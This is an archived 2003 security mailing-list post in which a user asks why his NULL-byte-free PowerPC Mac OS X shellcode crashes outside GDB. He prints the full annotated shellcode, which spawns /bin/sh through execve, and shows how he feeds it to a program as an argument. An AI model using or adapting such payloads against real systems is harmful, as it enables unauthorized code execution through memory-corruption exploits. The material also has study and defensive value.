I'm trying to use ghandi's OS X shellcode to get started on some
development. More specifically, I'm modifying it not to use NULL chars
so I can pass it though strings. I've got it working so far, except
that any application I try it with straight from the shell (i.e.
./a.out `cat code`) dies with a segfault, and when I run it with GDB, I
get a SIGTRAP in __dyld__dyld_start (which is where syscall 11/59 seem
to branch to). If I just continue in GDB, it goes through and launches
the shell like it's supposed to. What am I doing wrong? Here's the
code:
char shellcode[] =
"\x7c\xa5\x2a\x78" /* xor. r5, r5, r5 ; r5 = NULL */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x38\x65\x04\xf0" /* addi r3, r5, 0x4f << 4 */
"\x7c\x63\x26\x70" /* srawi r3, r3, 4 */
"\x7c\xA3\xf9\xae" /* stbx r5, r3, r31 (terminate /bin/sh) */
"\x38\x65\x04\x50" /* addi r3, r5, 0x45 << 4 */
"\x7c\x63\x26\x70" /* srawi r3, r3, 4 */
"\x7c\xA3\xfb\x2e" /* sthx r5, r3, r31 (fix sc) */
"\x40\xa2\xff\xfd" /* bnel shellcode */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x30" /* addi r31, r31, 268+36 */
"\x38\x7f\xfe\xf4" /* addi r3, r31, -268 ; r3 = path */
"\x90\x61\xff\xf8" /* stw r3, -8(r1) ; argv[0] = path */
"\x90\xa1\xff\xfc" /* stw r5, -4(r1) ; argv[1] = NULL */
"\x38\x81\xff\xf8" /* subi r4, r1, 8 ; r4 = {path, 0} */
"\x3b\xc0\x76\x01" /* li r30, 30209 */
"\x7f\xc0\x4e\x70" /* srawi r0, r30, 9 */
"\x44\xff\xff\x02" /* sc ; execve(r3, r4, r5) */
"/bin/sh";
By the way, I copy the shellcode into a file, removing the NULL
terminator from "/bin/sh" so it won't hang there (and I know this works
because of the aforementioned success with GDB).
Original source of OS X (Darwin) shellcode (credit where due):
http://www.dopesquad.net/security/shellcode/ppc/execve_binsh.h
Thanks in advance,
David
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 08:33:37 PDT